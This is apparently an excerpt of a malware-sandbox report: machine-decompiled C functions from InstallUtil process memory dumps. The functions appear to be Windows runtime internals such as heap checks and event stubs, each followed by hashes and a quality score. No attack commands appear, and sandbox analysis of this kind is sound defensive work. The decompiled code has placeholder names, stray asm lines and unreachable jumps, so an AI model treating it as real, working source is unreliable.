                      					_t13 =  *[fs:0x30];
                      					if((_t13[0x240] & 0x00000004) == 0) {
                      						goto L3;
                      					}
                      					if(E012E7D50() == 0) {
                      						_t13 = 0x7ffe0385;
                      					} else {
                      						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                      					}
                      					if(( *_t13 & 0x00000020) == 0) {
                      						goto L3;
                      					}
                      					return E01347016(0x14a4, _t22, _t23, _a4, _a8, 0);
                      				} else {
                      					L3:
                      					return _t13;
                      				}
                      			}







                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                      • Instruction ID: 6ffefba5158da27e64f022c01fcb0d4427e3bf90aa824a20043fef7b0ef9b378
                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                      • Instruction Fuzzy Hash: 8101F432220684DBE322A75DD809F697FD9EF91B98F0800A5FB148B6B2D779C800C355
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 46%
                      			E0135FE87(intOrPtr __ecx) {
                      				signed int _v8;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				signed int _v24;
                      				intOrPtr _v28;
                      				short _v54;
                      				char _v60;
                      				signed char* _t21;
                      				intOrPtr _t27;
                      				intOrPtr _t32;
                      				intOrPtr _t33;
                      				intOrPtr _t34;
                      				signed int _t35;
                      
                      				_v8 =  *0x13bd360 ^ _t35;
                      				_v16 = __ecx;
                      				_v54 = 0x1722;
                      				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                      				_v28 =  *((intOrPtr*)(__ecx + 4));
                      				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                      				if(E012E7D50() == 0) {
                      					_t21 = 0x7ffe0382;
                      				} else {
                      					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                      				}
                      				_push( &_v60);
                      				_push(0x10);
                      				_push(0x20402);
                      				_push( *_t21 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                      			}

















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 20fe9eb0708b87df219ece1d99559d050b6eab07ec03ddd13b13939b36d1dfa0
                      • Instruction ID: eb5772c1ae8b1c114b6042f8b723cb36d1e5658c8fe7bf1ea9c48e64318601b1
                      • Opcode Fuzzy Hash: 20fe9eb0708b87df219ece1d99559d050b6eab07ec03ddd13b13939b36d1dfa0
                      • Instruction Fuzzy Hash: A5018670A0020DEFCB54DFA8D546A6EB7F4FF04704F144169B908DB382D635D901CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 48%
                      			E0138131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				short _v50;
                      				char _v56;
                      				signed char* _t18;
                      				intOrPtr _t24;
                      				intOrPtr _t30;
                      				intOrPtr _t31;
                      				signed int _t32;
                      
                      				_t29 = __edx;
                      				_v8 =  *0x13bd360 ^ _t32;
                      				_v20 = _a4;
                      				_v12 = _a8;
                      				_v24 = __ecx;
                      				_v16 = __edx;
                      				_v50 = 0x1021;
                      				if(E012E7D50() == 0) {
                      					_t18 = 0x7ffe0380;
                      				} else {
                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      				}
                      				_push( &_v56);
                      				_push(0x10);
                      				_push(0x20402);
                      				_push( *_t18 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                      			}
















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 46ab0cbdbc373f1e42e28a0da94d2351ca656cb6fb00d4f73f3a94982e3170c1
                      • Instruction ID: 7b2abf955fe60b2510c4f9fceb81144f380e86187746f00e782ea245c9be60b5
                      • Opcode Fuzzy Hash: 46ab0cbdbc373f1e42e28a0da94d2351ca656cb6fb00d4f73f3a94982e3170c1
                      • Instruction Fuzzy Hash: 62013C71A0120DAFCB44EFA9D545AAEB7F4FF18704F404069B905EB381E6749A00CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 48%
                      			E01398F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				short _v50;
                      				char _v56;
                      				signed char* _t18;
                      				intOrPtr _t24;
                      				intOrPtr _t30;
                      				intOrPtr _t31;
                      				signed int _t32;
                      
                      				_t29 = __edx;
                      				_v8 =  *0x13bd360 ^ _t32;
                      				_v16 = __ecx;
                      				_v50 = 0x1c2c;
                      				_v24 = _a4;
                      				_v20 = _a8;
                      				_v12 = __edx;
                      				if(E012E7D50() == 0) {
                      					_t18 = 0x7ffe0386;
                      				} else {
                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      				}
                      				_push( &_v56);
                      				_push(0x10);
                      				_push(0x402);
                      				_push( *_t18 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                      			}
















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f1395ecab497361d85cd84c06ec42048a03f4ae0acaca0f826762a4598d56d7
                      • Instruction ID: 90dabb2de9a473979faedf53777beab70c5f90ed4427597c04d14563c2287da6
                      • Opcode Fuzzy Hash: 7f1395ecab497361d85cd84c06ec42048a03f4ae0acaca0f826762a4598d56d7
                      • Instruction Fuzzy Hash: EE014475A0120DAFDB00DFACD545AAEB7F4EF58304F504059B909EB381EB74DA00CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 46%
                      			E01381608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				short _v46;
                      				char _v52;
                      				signed char* _t15;
                      				intOrPtr _t21;
                      				intOrPtr _t27;
                      				intOrPtr _t28;
                      				signed int _t29;
                      
                      				_t26 = __edx;
                      				_v8 =  *0x13bd360 ^ _t29;
                      				_v12 = _a4;
                      				_v20 = __ecx;
                      				_v16 = __edx;
                      				_v46 = 0x1024;
                      				if(E012E7D50() == 0) {
                      					_t15 = 0x7ffe0380;
                      				} else {
                      					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                      				}
                      				_push( &_v52);
                      				_push(0xc);
                      				_push(0x20402);
                      				_push( *_t15 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                      			}















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c9a2cad02226b192f081e98d854c73b5ccc76df7a5c3b4d3a70c725816710b2c
                      • Instruction ID: 20ac41d5432aa86e022bd587326ca24d17318e23168ad54820e73828a30261a1
                      • Opcode Fuzzy Hash: c9a2cad02226b192f081e98d854c73b5ccc76df7a5c3b4d3a70c725816710b2c
                      • Instruction Fuzzy Hash: 04F06271E0524CEFDB14EFA8D445A6EB7F8EF14304F444069A905EB381E6349A00CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012EC577(void* __ecx, char _a4) {
                      				void* __esi;
                      				void* __ebp;
                      				void* _t17;
                      				void* _t19;
                      				void* _t20;
                      				void* _t21;
                      
                      				_t18 = __ecx;
                      				_t21 = __ecx;
                      				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E012EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x12a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                      					__eflags = _a4;
                      					if(__eflags != 0) {
                      						L10:
                      						E013988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                      						L9:
                      						return 0;
                      					}
                      					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                      					if(__eflags == 0) {
                      						goto L10;
                      					}
                      					goto L9;
                      				} else {
                      					return 1;
                      				}
                      			}










                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 688b3e38b557198292dc1290470a9577f91fe8179c8528b0aa9d6ea52d194edc
                      • Instruction ID: 43e0bd2aa0a40294c2734c439634058fcf443044b60ca9ea531eef687b6fa067
                      • Opcode Fuzzy Hash: 688b3e38b557198292dc1290470a9577f91fe8179c8528b0aa9d6ea52d194edc
                      • Instruction Fuzzy Hash: ADF0BEF29356969FE736C7ECE01CF627FE89B05670FD484A7D616A7202C6A4D8A0C250
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E01382073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                      				void* __esi;
                      				signed char _t3;
                      				signed char _t7;
                      				void* _t19;
                      
                      				_t17 = __ecx;
                      				_t3 = E0137FD22(__ecx);
                      				_t19 =  *0x13b849c - _t3; // 0x30c3b4c4
                      				if(_t19 == 0) {
                      					__eflags = _t17 -  *0x13b8748; // 0x0
                      					if(__eflags <= 0) {
                      						E01381C06();
                      						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                      						__eflags = _t3;
                      						if(_t3 != 0) {
                      							L5:
                      							__eflags =  *0x13b8724 & 0x00000004;
                      							if(( *0x13b8724 & 0x00000004) == 0) {
                      								asm("int3");
                      								return _t3;
                      							}
                      						} else {
                      							_t3 =  *0x7ffe02d4 & 0x00000003;
                      							__eflags = _t3 - 3;
                      							if(_t3 == 3) {
                      								goto L5;
                      							}
                      						}
                      					}
                      					return _t3;
                      				} else {
                      					_t7 =  *0x13b8724; // 0x0
                      					return E01378DF1(__ebx, 0xc0000374, 0x13b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                      				}
                      			}








                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2af1432679986e589a1403dcd3868f0f9300ff9d952528bf1fa98c9b69fa8262
                      • Instruction ID: 153c412f678e7cf5943d7f82d15e349b62b565ce5010429c0b5dd05ffd1d537a
                      • Opcode Fuzzy Hash: 2af1432679986e589a1403dcd3868f0f9300ff9d952528bf1fa98c9b69fa8262
                      • Instruction Fuzzy Hash: 85F0A0BA8152858AEE33BF2C79522E33F9ED79621CF1A14C5D6A057209D5388893CB20
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E0130927A(void* __ecx) {
                      				signed int _t11;
                      				void* _t14;
                      
                      				_t11 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                      				if(_t11 != 0) {
                      					E0130FA60(_t11, 0, 0x98);
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                      					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                      					E013092C6(_t11, _t14);
                      				}
                      				return _t11;
                      			}






                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                      • Instruction ID: d57fe5e2461f6aafedfbe677edd004fb883e58ff32343e92d5662dfa3f2b0a44
                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                      • Instruction Fuzzy Hash: B1E02B723405416BE7229E09CC94F1337DDDF92728F004078B9045E283C6E6DC0887A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 43%
                      			E01398D34(intOrPtr __ecx, intOrPtr __edx) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				short _v42;
                      				char _v48;
                      				signed char* _t12;
                      				intOrPtr _t18;
                      				intOrPtr _t24;
                      				intOrPtr _t25;
                      				signed int _t26;
                      
                      				_t23 = __edx;
                      				_v8 =  *0x13bd360 ^ _t26;
                      				_v16 = __ecx;
                      				_v42 = 0x1c2b;
                      				_v12 = __edx;
                      				if(E012E7D50() == 0) {
                      					_t12 = 0x7ffe0386;
                      				} else {
                      					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      				}
                      				_push( &_v48);
                      				_push(8);
                      				_push(0x20402);
                      				_push( *_t12 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                      			}














                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 56ea03262e020c5eea5654366592a76b31567ca9532549b1bd0ff7c734b46e16
                      • Instruction ID: 58570eb57e4f3c9cd0e3bb73e6430fa9dd7734863f7b22195d5ee765e210f635
                      • Opcode Fuzzy Hash: 56ea03262e020c5eea5654366592a76b31567ca9532549b1bd0ff7c734b46e16
                      • Instruction Fuzzy Hash: 42F05E70E0460DAFDB14EFB8D555B6EB7F8EF58704F5080A9EA05EB291EA34D900CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 36%
                      			E01398B58(intOrPtr __ecx) {
                      				signed int _v8;
                      				intOrPtr _v20;
                      				short _v46;
                      				char _v52;
                      				signed char* _t11;
                      				intOrPtr _t17;
                      				intOrPtr _t22;
                      				intOrPtr _t23;
                      				intOrPtr _t24;
                      				signed int _t25;
                      
                      				_v8 =  *0x13bd360 ^ _t25;
                      				_v20 = __ecx;
                      				_v46 = 0x1c26;
                      				if(E012E7D50() == 0) {
                      					_t11 = 0x7ffe0386;
                      				} else {
                      					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      				}
                      				_push( &_v52);
                      				_push(4);
                      				_push(0x402);
                      				_push( *_t11 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                      			}














                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f0e1bc8f20017150eb2534a511ead5c0828f2faee06c00c5269ff8e220d168c2
                      • Instruction ID: fcb7e9211e0a6dba5967a0d832b01b6db6f7418ead213600afd553dabb8b9e74
                      • Opcode Fuzzy Hash: f0e1bc8f20017150eb2534a511ead5c0828f2faee06c00c5269ff8e220d168c2
                      • Instruction Fuzzy Hash: A7F05EB1A1425DABDB10EBA8D916A6EB7A8AB44308F440499AA059B2C1EA74D900C794
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E012E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                      				signed int _t8;
                      				void* _t10;
                      				short* _t17;
                      				void* _t19;
                      				intOrPtr _t20;
                      				void* _t21;
                      
                      				_t20 = __esi;
                      				_t19 = __edi;
                      				_t17 = __ebx;
                      				if( *((char*)(_t21 - 0x25)) != 0) {
                      					if(__ecx == 0) {
                      						E012DEB70(__ecx, 0x13b79a0);
                      					} else {
                      						asm("lock xadd [ecx], eax");
                      						if((_t8 | 0xffffffff) == 0) {
                      							_push( *((intOrPtr*)(__ecx + 4)));
                      							E013095D0();
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                      							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                      							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                      						}
                      					}
                      					L10:
                      				}
                      				_t10 = _t19 + _t19;
                      				if(_t20 >= _t10) {
                      					if(_t19 != 0) {
                      						 *_t17 = 0;
                      						return 0;
                      					}
                      				}
                      				return _t10;
                      				goto L10;
                      			}










                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4a131f362a80dd10751540454252b0ceb1b9f2c53d14ee1d7178d12c1180589d
                      • Instruction ID: 0452ec3cd51474cd3f52a07dd5b8174df28d97195160be1527adce7a729c347f
                      • Opcode Fuzzy Hash: 4a131f362a80dd10751540454252b0ceb1b9f2c53d14ee1d7178d12c1180589d
                      • Instruction Fuzzy Hash: F1F0E234A3024AEADF12EB6CC845F79BFF5EF14218F840215EA91AB1A1E775D800C7C5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 36%
                      			E01398CD6(intOrPtr __ecx) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				short _v38;
                      				char _v44;
                      				signed char* _t11;
                      				intOrPtr _t17;
                      				intOrPtr _t22;
                      				intOrPtr _t23;
                      				intOrPtr _t24;
                      				signed int _t25;
                      
                      				_v8 =  *0x13bd360 ^ _t25;
                      				_v12 = __ecx;
                      				_v38 = 0x1c2d;
                      				if(E012E7D50() == 0) {
                      					_t11 = 0x7ffe0386;
                      				} else {
                      					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                      				}
                      				_push( &_v44);
                      				_push(0xffffffe4);
                      				_push(0x402);
                      				_push( *_t11 & 0x000000ff);
                      				return E0130B640(E01309AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                      			}














                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eb90f113d691a18177a862b33cd34fc687e9d73edf543357f88b42ea2a6d2792
                      • Instruction ID: 37629721e2b6cfbf68559fbe616d641e63d257bab2f170f4198649f7c360990e
                      • Opcode Fuzzy Hash: eb90f113d691a18177a862b33cd34fc687e9d73edf543357f88b42ea2a6d2792
                      • Instruction Fuzzy Hash: 05F08270A0520DAFDF04DBA8E955E6E77F8EF59308F500199E915EB2C1EA34D900C754
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012C4F2E(void* __ecx, char _a4) {
                      				void* __esi;
                      				void* __ebp;
                      				void* _t17;
                      				void* _t19;
                      				void* _t20;
                      				void* _t21;
                      
                      				_t18 = __ecx;
                      				_t21 = __ecx;
                      				if(__ecx == 0) {
                      					L6:
                      					__eflags = _a4;
                      					if(__eflags != 0) {
                      						L8:
                      						E013988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                      						L9:
                      						return 0;
                      					}
                      					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                      					if(__eflags != 0) {
                      						goto L9;
                      					}
                      					goto L8;
                      				}
                      				_t18 = __ecx + 0x30;
                      				if(E012EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x12a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                      					goto L6;
                      				} else {
                      					return 1;
                      				}
                      			}










                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 09dd21cee23c1f68a4e58b6abaeb12fbf6df2f71894e69f0c06487945bf19292
                      • Instruction ID: c3d0cf1a2891461ca166b054c1f5cf32b9b924227f8ca65f2554d2952acbf2b5
                      • Opcode Fuzzy Hash: 09dd21cee23c1f68a4e58b6abaeb12fbf6df2f71894e69f0c06487945bf19292
                      • Instruction Fuzzy Hash: 13F0E2325256A98FD776EB1CD184B22BBD5AB0177CF4444A4E40587922C724EC48C680
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012FA44B(signed int __ecx) {
                      				intOrPtr _t13;
                      				signed int _t15;
                      				signed int* _t16;
                      				signed int* _t17;
                      
                      				_t13 =  *0x13b7b9c; // 0x0
                      				_t15 = __ecx;
                      				_t16 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                      				if(_t16 == 0) {
                      					return 0;
                      				}
                      				 *_t16 = _t15;
                      				_t17 =  &(_t16[2]);
                      				E0130FA60(_t17, 0, _t15 << 2);
                      				return _t17;
                      			}








                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0ef05ec457eadb5a9dacca8a4ed15e11a614a3d6b6d3a0bd502c2be01b995171
                      • Instruction ID: 23d8e1e9747d20d258658c79b6233da400204650304e46fe94d7f041aba97c4d
                      • Opcode Fuzzy Hash: 0ef05ec457eadb5a9dacca8a4ed15e11a614a3d6b6d3a0bd502c2be01b995171
                      • Instruction Fuzzy Hash: 1CE09272A11422ABD2229A18AC00F66B39DEBE4651F094039EB08C7254D668DD01CBE0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 79%
                      			E012CF358(void* __ecx, signed int __edx) {
                      				char _v8;
                      				signed int _t9;
                      				void* _t20;
                      
                      				_push(__ecx);
                      				_t9 = 2;
                      				_t20 = 0;
                      				if(E012FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                      					_t20 = L012E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                      				}
                      				return _t20;
                      			}







                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                      • Instruction ID: 2ddbb860268ec0e05f32d2eb46025c3295e4db7b1473dfd1366a6e186cf3e647
                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                      • Instruction Fuzzy Hash: CFE0D833A50158FBDB21A7D99E05FAABFADDB54E60F00015ABF04DB190D5609D00C6D0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012DFF60(intOrPtr _a4) {
                      				void* __ecx;
                      				void* __ebp;
                      				void* _t13;
                      				intOrPtr _t14;
                      				void* _t15;
                      				void* _t16;
                      				void* _t17;
                      
                      				_t14 = _a4;
                      				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x12a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                      					return E013988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                      				} else {
                      					return E012E0050(_t14);
                      				}
                      			}











                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
